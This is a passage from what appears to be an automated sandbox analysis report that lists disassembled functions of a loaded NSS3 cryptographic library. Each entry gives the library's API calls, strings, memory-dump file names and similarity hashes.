Part of subcall function 6C772BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C772A28,00000060,00000001), ref: 6C772C07
Part of subcall function 6C772BE0: SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6C772A28,00000060,00000001), ref: 6C772C1E
Part of subcall function 6C772BE0: free.MOZGLUE(?,00000000,00000000,?,6C772A28,00000060,00000001), ref: 6C772C4A

free.MOZGLUE(?,?,6C77AAD4,?,?,?,?,?,?,?,?,00000000,?,6C7780C1), ref: 6C775D0F
free.MOZGLUE(?,?,?,6C77AAD4,?,?,?,?,?,?,?,?,00000000,?,6C7780C1), ref: 6C775D4E
free.MOZGLUE(?,?,?,6C77AAD4,?,?,?,?,?,?,?,?,00000000,?,6C7780C1), ref: 6C775D62
free.MOZGLUE(?,?,?,?,6C77AAD4,?,?,?,?,?,?,?,?,00000000,?,6C7780C1), ref: 6C775D85
free.MOZGLUE(?,?,?,?,6C77AAD4,?,?,?,?,?,?,?,?,00000000,?,6C7780C1), ref: 6C775D99
free.MOZGLUE(?,?,?,?,6C77AAD4,?,?,?,?,?,?,?,?,00000000,?,6C7780C1), ref: 6C775DFA
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,6C77AAD4,?,?,?,?,?,?,?,?,00000000,?,6C7780C1), ref: 6C775E33
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,6C77AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C775E3E
free.MOZGLUE(?,?,?,?,?,?,6C77AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C775E47
free.MOZGLUE(?,?,?,?,6C77AAD4,?,?,?,?,?,?,?,?,00000000,?,6C7780C1), ref: 6C775E60
SECITEM_ZfreeItem_Util.NSS3(00000008,00000000,?,?,?,6C77AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C775E78
free.MOZGLUE(?,?,?,?,?,?,?,6C77AAD4), ref: 6C775EB9
free.MOZGLUE(?,?,?,?,?,?,?,6C77AAD4), ref: 6C775EF0
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,6C77AAD4), ref: 6C775F3D
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C77AAD4), ref: 6C775F4B

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: free$Destroy$Public$CertificatePrivate$Item_UtilZfree
String ID:
API String ID: 4273776295-0
Opcode ID: 4e20429ad54250f36ba3a04b452355b9ca35a471be429869f03913b0d3177816
Instruction ID: 750c193ef15ff3da967e7e88c99f3dda2f4725d95fee33d5d6eecf6387e7aa97
Opcode Fuzzy Hash: 4e20429ad54250f36ba3a04b452355b9ca35a471be429869f03913b0d3177816
Instruction Fuzzy Hash: 737191B4A00B059FDB60CF24D989A92B7B5FF49308F148A39D81E87711E731F955CBA1

Function 6C6F8DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?), ref: 6C6F8E22
EnterCriticalSection.KERNEL32(?), ref: 6C6F8E36
memset.VCRUNTIME140(?,00000000,?), ref: 6C6F8E4F
calloc.MOZGLUE(00000001,?,?,?), ref: 6C6F8E78
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C6F8E9B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C6F8EAC
PL_ArenaAllocate.NSS3(?,?), ref: 6C6F8EDE
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C6F8EF0
memset.VCRUNTIME140(?,00000000,?), ref: 6C6F8F00
free.MOZGLUE(?), ref: 6C6F8F0E
memcpy.VCRUNTIME140(?,?,?), ref: 6C6F8F39
memset.VCRUNTIME140(?,00000000,?), ref: 6C6F8F4A
memset.VCRUNTIME140(?,00000000,?), ref: 6C6F8F5B
PR_Unlock.NSS3(?), ref: 6C6F8F72
PR_Unlock.NSS3(?), ref: 6C6F8F82

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
String ID:
API String ID: 1569127702-0
Opcode ID: 64643880da3c43b0df59329604796418f0677507e2e0f13539a798ed1a449f97
Instruction ID: e210d7c07dfb40f1ff12cdc5b61bf33d2192bf0c9ba33ef173747767ca844093
Opcode Fuzzy Hash: 64643880da3c43b0df59329604796418f0677507e2e0f13539a798ed1a449f97
Instruction Fuzzy Hash: C4516CB2D002059FE7108F69CC889AEB7BAEF4A358B144169EC289B710E731DD07C7E4

Function 6C71CE90 Relevance: 22.6, APIs: 15, Instructions: 129COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,00000132), ref: 6C71CE9E
PK11_DoesMechanism.NSS3(?,00000321), ref: 6C71CEBB
PK11_DoesMechanism.NSS3(?,00001081), ref: 6C71CED8
PK11_DoesMechanism.NSS3(?,00000551), ref: 6C71CEF5
PK11_DoesMechanism.NSS3(?,00000651), ref: 6C71CF12
PK11_DoesMechanism.NSS3(?,00000321), ref: 6C71CF2F
PK11_DoesMechanism.NSS3(?,00000121), ref: 6C71CF4C
PK11_DoesMechanism.NSS3(?,00000400), ref: 6C71CF69
PK11_DoesMechanism.NSS3(?,00000341), ref: 6C71CF86
PK11_DoesMechanism.NSS3(?,00000311), ref: 6C71CFA3
PK11_DoesMechanism.NSS3(?,00000301), ref: 6C71CFBC
PK11_DoesMechanism.NSS3(?,00000331), ref: 6C71CFD5
PK11_DoesMechanism.NSS3(?,00000101), ref: 6C71CFEE
PK11_DoesMechanism.NSS3(?,00000141), ref: 6C71D007
PK11_DoesMechanism.NSS3(?,00001008), ref: 6C71D021

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: DoesK11_Mechanism
String ID:
API String ID: 622698949-0
Opcode ID: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction ID: ba243d836f0ed87a4fd21d255ccc5e095c2806682c5267139e75f1b1301e78d3
Opcode Fuzzy Hash: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction Fuzzy Hash: C33112717569303BEF0E50575F2EB9E144A4B6530FF485038F90AE5BC2F6C5961702EA

Function 6C7F0FF0 Relevance: 22.6, APIs: 15, Instructions: 92COMMON

Download Yara Rule

APIs

PR_Lock.NSS3(?), ref: 6C7F1000

Part of subcall function 6C7A9BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C6D1A48), ref: 6C7A9BB3
Part of subcall function 6C7A9BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C6D1A48), ref: 6C7A9BC8

PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C7F1016

Part of subcall function 6C78C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C78C2BF

PR_Unlock.NSS3(?), ref: 6C7F1021

Part of subcall function 6C78DD70: TlsGetValue.KERNEL32 ref: 6C78DD8C
Part of subcall function 6C78DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C78DDB4

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C7F1046
PR_Unlock.NSS3(?), ref: 6C7F106B
PR_Lock.NSS3 ref: 6C7F1079
PR_Unlock.NSS3 ref: 6C7F1096
free.MOZGLUE(?), ref: 6C7F10A7
free.MOZGLUE(?), ref: 6C7F10B4
PR_DestroyCondVar.NSS3(?), ref: 6C7F10BF
PR_DestroyCondVar.NSS3(?), ref: 6C7F10CA
PR_DestroyCondVar.NSS3(?), ref: 6C7F10D5
PR_DestroyCondVar.NSS3(?), ref: 6C7F10E0
PR_DestroyLock.NSS3(?), ref: 6C7F10EB
free.MOZGLUE(?), ref: 6C7F1105

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
String ID:
API String ID: 8544004-0
Opcode ID: 99c06eac624d6a975f57cac12780d487178e136aca1b8b0fccd807bc0724b0d5
Instruction ID: fe609d302b8f5175a83a8c5ea1c8e18976fc70a4ca916356f2ae5ee4f62fcc27
Opcode Fuzzy Hash: 99c06eac624d6a975f57cac12780d487178e136aca1b8b0fccd807bc0724b0d5
Instruction Fuzzy Hash: EA318BF5900401ABD711AF14EE8AA45B7B1BF1131DF184231E81902F61E732F979EBD6

Function 6C66DC60 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C66DD56
memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6C66DD7C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C66DE67
memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6C66DEC4
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C66DECD

Strings

database corruption, xrefs: 6C66DF77, 6C66DFE7
%s at line %d of [%.10s], xrefs: 6C66DF7C, 6C66DFEC
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C66DF6D, 6C66DFCC, 6C66DFDD

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: memcpy$_byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2339628231-598938438
Opcode ID: 337a78395b3e4ec4543a33b1d5f348a3e2aaab9b5dc09de242ecc7ba94b7507a
Instruction ID: eb8deb2af053ce57d990feea2b102698a3fcce5f7d5a71b03d8d46bccd2e6ed5
Opcode Fuzzy Hash: 337a78395b3e4ec4543a33b1d5f348a3e2aaab9b5dc09de242ecc7ba94b7507a
Instruction Fuzzy Hash: 99A1C7716042059FC710DF2AC880A6BB7F5EF85308F25892DF8898BF51D730E846CBA6

Function 6C72EDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(?), ref: 6C72EE0B

Part of subcall function 6C740BE0: malloc.MOZGLUE(6C738D2D,?,00000000,?), ref: 6C740BF8
Part of subcall function 6C740BE0: TlsGetValue.KERNEL32(6C738D2D,?,00000000,?), ref: 6C740C15

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C72EEE1

Part of subcall function 6C721D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C721D7E
Part of subcall function 6C721D50: EnterCriticalSection.KERNEL32(?), ref: 6C721D8E
Part of subcall function 6C721D50: PR_Unlock.NSS3(?), ref: 6C721DD3

TlsGetValue.KERNEL32 ref: 6C72EE51
EnterCriticalSection.KERNEL32(?), ref: 6C72EE65
PR_Unlock.NSS3(?), ref: 6C72EEA2
free.MOZGLUE(?), ref: 6C72EEBB
PR_SetError.NSS3(00000000,00000000), ref: 6C72EED0
PR_Unlock.NSS3(?), ref: 6C72EF48
free.MOZGLUE(?), ref: 6C72EF68
PR_SetError.NSS3(00000000,00000000), ref: 6C72EF7D
PK11_DoesMechanism.NSS3(?,?), ref: 6C72EFA4
free.MOZGLUE(?), ref: 6C72EFDA
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C72F055
free.MOZGLUE(?), ref: 6C72F060

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
String ID:
API String ID: 2524771861-0
Opcode ID: 999b311dd8f6b0154919ba599a59465715056365241e66afbfa17049a12d4e4e
Instruction ID: 1c5527e96f28b5b92040899dab2da43fef6802b33041df8bede8dbdd2fb5cf5a
Opcode Fuzzy Hash: 999b311dd8f6b0154919ba599a59465715056365241e66afbfa17049a12d4e4e
Instruction Fuzzy Hash: 958171B1E00219ABEB10DFA5DD89ADE77B9BF08319F144034E909A3751E735E924CBE1

Function 6C6F4CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6C6F4D80
PORT_Alloc_Util.NSS3(00000000), ref: 6C6F4D95
PORT_NewArena_Util.NSS3(00000800), ref: 6C6F4DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6F4E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6C6F4E43
PORT_NewArena_Util.NSS3(00000800), ref: 6C6F4E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C6F4E85
DER_Encode_Util.NSS3(?,?,6C8405A4,00000000), ref: 6C6F4EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C6F4F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C6F4F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C6F4F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C6F4F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6F4F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C6F4FC8

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID:
API String ID: 2843999940-0
Opcode ID: a9ef1a4be5124bf3d99723e888c6f2b3be51822bece7b96166219216df556b5a
Instruction ID: fb12def91daba688ca05c7ac601fc624910024e0e3676d3e3c4a86dac8ee1a6c
Opcode Fuzzy Hash: a9ef1a4be5124bf3d99723e888c6f2b3be51822bece7b96166219216df556b5a
Instruction Fuzzy Hash: 8B81D2719093019FE701CF28DA44BABB7E5ABC4358F04852DF96CCBA41E770E906CB96

Function 6C735C10 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221COMMON

Download Yara Rule

APIs

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6C735C9B
PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6C735CF4
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6C735CFD
PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6C735D42
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6C735D4E
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C735D78
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C735E18
TlsGetValue.KERNEL32 ref: 6C735E5E
EnterCriticalSection.KERNEL32(?), ref: 6C735E72
PR_Unlock.NSS3(?), ref: 6C735E8B

Part of subcall function 6C72F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C72F854
Part of subcall function 6C72F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C72F868
Part of subcall function 6C72F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C72F882
Part of subcall function 6C72F820: free.MOZGLUE(04C483FF,?,?), ref: 6C72F889
Part of subcall function 6C72F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C72F8A4
Part of subcall function 6C72F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C72F8AB
Part of subcall function 6C72F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C72F8C9
Part of subcall function 6C72F820: free.MOZGLUE(280F10EC,?,?), ref: 6C72F8D0

Strings

d, xrefs: 6C735C36
tokens=[0x%x=<%s>], xrefs: 6C735D3D

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
String ID: d$tokens=[0x%x=<%s>]
API String ID: 2028831712-1373489631
Opcode ID: d6b9fcbfaaddb663bc4317667656999cf65581d5ed69963e256e4a378d80b72d
Instruction ID: 640792022146f2d99132decab2d1d04fea3f4f053f3f846326d17eba44f8ca89
Opcode Fuzzy Hash: d6b9fcbfaaddb663bc4317667656999cf65581d5ed69963e256e4a378d80b72d
Instruction Fuzzy Hash: F07136F0A042259BEB01AF25EE4976A3379AF4031CF145035DC0D9AB83EB36E915C7D2

Function 6C728F40 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6C729582), ref: 6C728F5B

Part of subcall function 6C73BE30: SECOID_FindOID_Util.NSS3(6C6F311B,00000000,?,6C6F311B,?), ref: 6C73BE44

PORT_NewArena_Util.NSS3(00000800), ref: 6C728F6A

Part of subcall function 6C740FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6E87ED,00000800,6C6DEF74,00000000), ref: 6C741000
Part of subcall function 6C740FF0: PR_NewLock.NSS3(?,00000800,6C6DEF74,00000000), ref: 6C741016
Part of subcall function 6C740FF0: PL_InitArenaPool.NSS3(00000000,security,6C6E87ED,00000008,?,00000800,6C6DEF74,00000000), ref: 6C74102B

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C728FC3
PK11_GetIVLength.NSS3(-00000001), ref: 6C728FE0
SEC_ASN1DecodeItem_Util.NSS3(?,?,6C80D820,6C729576), ref: 6C728FF9
DER_GetInteger_Util.NSS3(?), ref: 6C72901D
PORT_ZAlloc_Util.NSS3(?), ref: 6C72903E
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C729062
memcpy.VCRUNTIME140(00000024,?,?), ref: 6C7290A2
PORT_ZAlloc_Util.NSS3(?), ref: 6C7290CA
memcpy.VCRUNTIME140(00000018,?,?), ref: 6C7290F0
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C72912D
free.MOZGLUE(00000000), ref: 6C729136
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C729145

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
String ID:
API String ID: 3626836424-0
Opcode ID: 5410d70d9a140c98c66d7c4e0f2374a0eaf1da9df1bb6ba3160cf084642e6ef9
Instruction ID: e4ac82876ac1a9d57c32a993785b4f38e05b50438827b7b00587deb01b160ce2
Opcode Fuzzy Hash: 5410d70d9a140c98c66d7c4e0f2374a0eaf1da9df1bb6ba3160cf084642e6ef9
Instruction Fuzzy Hash: 8851F4B2A042009BE710CF29DD85B97B7E4EF94358F084939E958C7741E735E949CBD2

Function 6C6DAF30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C6DAF47

Part of subcall function 6C7A9090: TlsGetValue.KERNEL32 ref: 6C7A90AB
Part of subcall function 6C7A9090: TlsGetValue.KERNEL32 ref: 6C7A90C9
Part of subcall function 6C7A9090: EnterCriticalSection.KERNEL32 ref: 6C7A90E5
Part of subcall function 6C7A9090: TlsGetValue.KERNEL32 ref: 6C7A9116
Part of subcall function 6C7A9090: LeaveCriticalSection.KERNEL32 ref: 6C7A913F

FreeLibrary.KERNEL32(?), ref: 6C6DAF6D
free.MOZGLUE(?), ref: 6C6DAFA4
free.MOZGLUE(?), ref: 6C6DAFAA
PR_ExitMonitor.NSS3 ref: 6C6DAFB5
PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6C6DAFF5
PR_ExitMonitor.NSS3 ref: 6C6DB005
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C6DB014
PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6C6DB028
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C6DB03C

Strings

%s decr => %d, xrefs: 6C6DAFF0
Unloaded library %s, xrefs: 6C6DB023

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
String ID: %s decr => %d$Unloaded library %s
API String ID: 4015679603-2877805755
Opcode ID: 83cdb8e6fdad58e7ba1bd55621b9e8d6c871b890f0f2126963a70950afa14b0a
Instruction ID: b4358885e37ab6202f9d1fbbe90b9ff6437503451ad82564ee90fb4e6900a185
Opcode Fuzzy Hash: 83cdb8e6fdad58e7ba1bd55621b9e8d6c871b890f0f2126963a70950afa14b0a
Instruction Fuzzy Hash: 2C3139B5B09111ABDB10EF61EC48A46B7B5EB4531CB1A8275EC0587B02F332F824C7E6

Function 6C726C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C72781D,00000000,6C71BE2C,?,6C726B1D,?,?,?,?,00000000,00000000,6C72781D), ref: 6C726C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C72781D,?,6C71BE2C,?), ref: 6C726C58
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C72781D), ref: 6C726C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C726C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C726C96

Part of subcall function 6C6D1240: TlsGetValue.KERNEL32(00000040,?,6C6D116C,NSPR_LOG_MODULES), ref: 6C6D1267
Part of subcall function 6C6D1240: EnterCriticalSection.KERNEL32(?,?,?,6C6D116C,NSPR_LOG_MODULES), ref: 6C6D127C
Part of subcall function 6C6D1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C6D116C,NSPR_LOG_MODULES), ref: 6C6D1291
